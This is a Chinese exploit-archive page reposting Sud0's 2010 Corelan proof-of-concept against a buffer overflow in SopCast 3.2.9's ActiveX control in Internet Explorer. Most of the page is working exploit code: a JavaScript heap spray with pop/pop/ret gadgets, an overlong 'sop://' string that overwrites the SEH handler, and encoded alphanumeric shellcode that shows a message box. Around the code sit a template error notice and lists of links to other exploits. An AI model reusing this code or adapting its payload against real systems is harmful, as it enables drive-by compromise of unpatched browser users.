dedecms织梦内容管理系统      
首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 支持论坛
  当前位置:主页>安全文章>文章资料>Exploits>文档内容
SopCast New 0Day Remote Exploit
来源: 作者:Sud0 发布时间:2010-08-11  
你会看到这个提示,那是因为你的系统无法识别某栏目的模型信息,或者你新建模型后,没为这个模型设计单独的模板。不同模型的文档浏览页的模板为:article_模型名字标识.htm 如“article_article.htm”,更多的信息你可以在频道模型管理的地方查看。
body  

<html>
<Center>
<H1>Sopcast POC by Sud0<br></H1>
<b>Tested on XP SP3 EN on VBox with IE 7<br>
Spraying a lot to get a nice unicode usable address 0x20260078<br>
I sprayed with a set of P/P/R instructions to come back to the stack<br>
***Need internet connection on the box to trigger the vuln***<br>
Wait for the Spray to finish (IE will seem freezed for some seconds)<br>
The Sopcast control will be loaded and shown on the page<br>
wait approx 3 to 5 seconds and a message box should appear<br>
</b>
</Center>
<!--
# Exploit Title : SopCast BOF
# Date          : August 10, 2010
# Author        : Sud0
# Bug found by  : Sud0
# Software Link : http://www.sopcast.com - http://www.easetuner.com
# Version       : 3.2.9
# OS            : Windows
# Tested on     : XP SP3 En (VirtualBox) Fully Patched, Internet Explorer 7
# Type of vuln  : Stack Buffer Overflow - SEH
# Advisory      : http://www.corelan.be:8800/advisories.php?id=CORELAN-10-059
# Big thanks to : my wife for supporting me
# Greetz to     : Corelan Security Team
# http://www.corelan.be:8800/index.php/security/corelan-team-members/
 

|------------------------------------------------------------------|
|                         __               __                      |
|   _________  ________  / /___ _____     / /____  ____ _____ ___  |
|  / ___/ __ \/ ___/ _ \/ / __ `/ __ \   / __/ _ \/ __ `/ __ `__ \ |
| / /__/ /_/ / /  /  __/ / /_/ / / / /  / /_/  __/ /_/ / / / / / / |
| \___/\____/_/   \___/_/\__,_/_/ /_/   \__/\___/\__,_/_/ /_/ /_/  |
|                                                                  |
|                                       http://www.corelan.be:8800 |
|                                              security@corelan.be |
|                                                                  |
|-------------------------------------------------[ EIP Hunters ]--|

 Script provided 'as is', without any warranty.
 Use for educational purposes only.
 Do not use this code to do anything illegal !
 Corelan does not want anyone to use this script
 for malicious and/or illegal purposes
 Corelan cannot be held responsible for any illegal use.

 Note : you are not allowed to edit/modify this code. 
 If you do, Corelan cannot be held responsible for any damages this may cause.

 

-->

<object classid='clsid:8FEFF364-6A5F-4966-A917-A3AC28411659' id='boom' ></object>
<script>
// ######################################### Begin of spraying with (nops + Pop/Pop/Ret) instructions to come back to the stack

var nops = unescape("%49%41");  // some nice nops on ECX
var ppr = unescape("%49%58%49%58%49%c3");  // Pop EAX / pop EAX / Ret
var ppraddy = 0x20260078;
var BlockSize = 0x200000;
var BlockHeaderSize = 0x26;
var PPRSize = 0x6;
var nopSize = BlockSize - (PPRSize + BlockHeaderSize);
var heapBlocks = (ppraddy+BlockSize*2)/(BlockSize*2);
var Spray = new Array();
  while (nops.length<nopSize)
 {
 nops += nops;
 }
nops = nops.substring(0,nopSize);
  for (i=0;i<heapBlocks;i++)
   {
    Spray[i] = nops +  ppr;
   }
// ######################################### end of spraying

      var buffSize = 522;   // (516 + 6 = sop:// )offset to overwrite EIP
      var x="sop://";
 while (x.length<buffSize) x += unescape("%41");
 x+=unescape("%41");
 x+=unescape("%41");
 x+=unescape("%87");  //low unicode bytes of seh destination address 0035 (0x20260087)
 x+="…";  //High unicode bytes of seh destination address 2026 (0x20260087)
 x+=unescape("%49%5A%49%5A%49%5A%49%5A%49%5A%49%5A%49%5A%49%5A%49%5A%49%5A%49%5A%49");
      x+=unescape("%5A%49%5A%49%5A%49%5A%49%5A%49%5A%49%5A%49%5A%49%5A%49%5A%49%5A%49%5A%49%5A");
      x+=unescape("%49%5A%49%5A%49%5A%49%5A%49%5A%49%5A%49%5A%49%5A%49%5A%49%5A%49%5A%49%5A%49");
      x+=unescape("%5A%49%5A%49%5A%49%5A%49%5A%49%5A%49%5A%49%5A%49%5A%49%5A%49%5A%49%52%49%c3");

// some junk before shellcode
for (i=0;i<330;i++)
   {
    x+=unescape("%41");
   }

// messagebox shellcode
x+="RRYAIAIAIAIAIAIAIAIAIAIAIAIAIAIAjXAQADAZABARALAYAIAQAIAQAIAhAAAZ1AIAIAJ11AIAIABABABQI1AIQIA";
x+="IQI111AIAJQYAZBABABABABkMAGB9u4JBfyjK3kXYRTLdKDNQyBx2pzlqGYS4DKPqlpBkQfzl2kpvMLTKq6LH4KqnmP";
x+="TKMfNXNoLXrUL3Ny9qXQKOYQc0bkplo4nDrk15oLTKPTKUD8KQXj2kMzlX4K1JkpyqjK7sp7OY4KMdtKKQZNLqIomaw";
x+="PilVLRdWPBTlJ6a6olMJawWHil1YoKOKOmk3LKtMXSEgnRkojO4YqZK0fBkzlpKRkqJKlm1JKdKitRkkQxhe9oTLdML";
x+="31es6RKXKywdsY9UCYfbOx2npNZnzLpR8h5LkOKOkOQyQ5kT5kSNj8yRBSSWmLo4nrxhdKKOKOKOe9oUkXoxRLplMPK";
x+="O1XLsnRnNs41Xaet3REbRQx1LmTkZSYK6pVKOPULDqyWRPPWKSxg2Nm5lQwklktPRYXqN9okOYo38PlaQPnQH2HPCrO";
x+="2RqUNQ9KrhqLMTlG1yGsQXnPpXkpKp1XKpNs45s4OxQTmPOrQiQXpoOysDouQXMucHRPPllqWYrhPLktKaQy7qNQ6rN";
x+="rpSpQqBkOvpNQgPB0ioNuyxkZA";

// some junk after shellcode
for (i=0;i<40000;i++)
   {
    x+=unescape("%41");
   }

// calling the boom
    boom.ChannelName=x; // setting channel name
    boom.SetSopAddress(x); // getting address to trigger the boom

</script>
</html>

[收藏] [推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
用户名: 新注册) 密码: 匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文档
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
  相关文档
·Rosoft media player 4.4.4 SEH
·Play! Framework <= 1.0.3.1 Dir
·Mthree Development MP3 to WAV
·EASYFTP BOF Vulnerabilities in
·AoAAudioExtractor 2.0.0.0 Acti
·RSP MP3 Player OCX ActiveX Buf
·Quintessential Player 5.0.121
·PDF EDITEUR v3.0 - File Format
·ffdshow Video Codec Denial of
·Linux Kernel <= 2.6.33.3 SCTP
  推荐文档
 
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved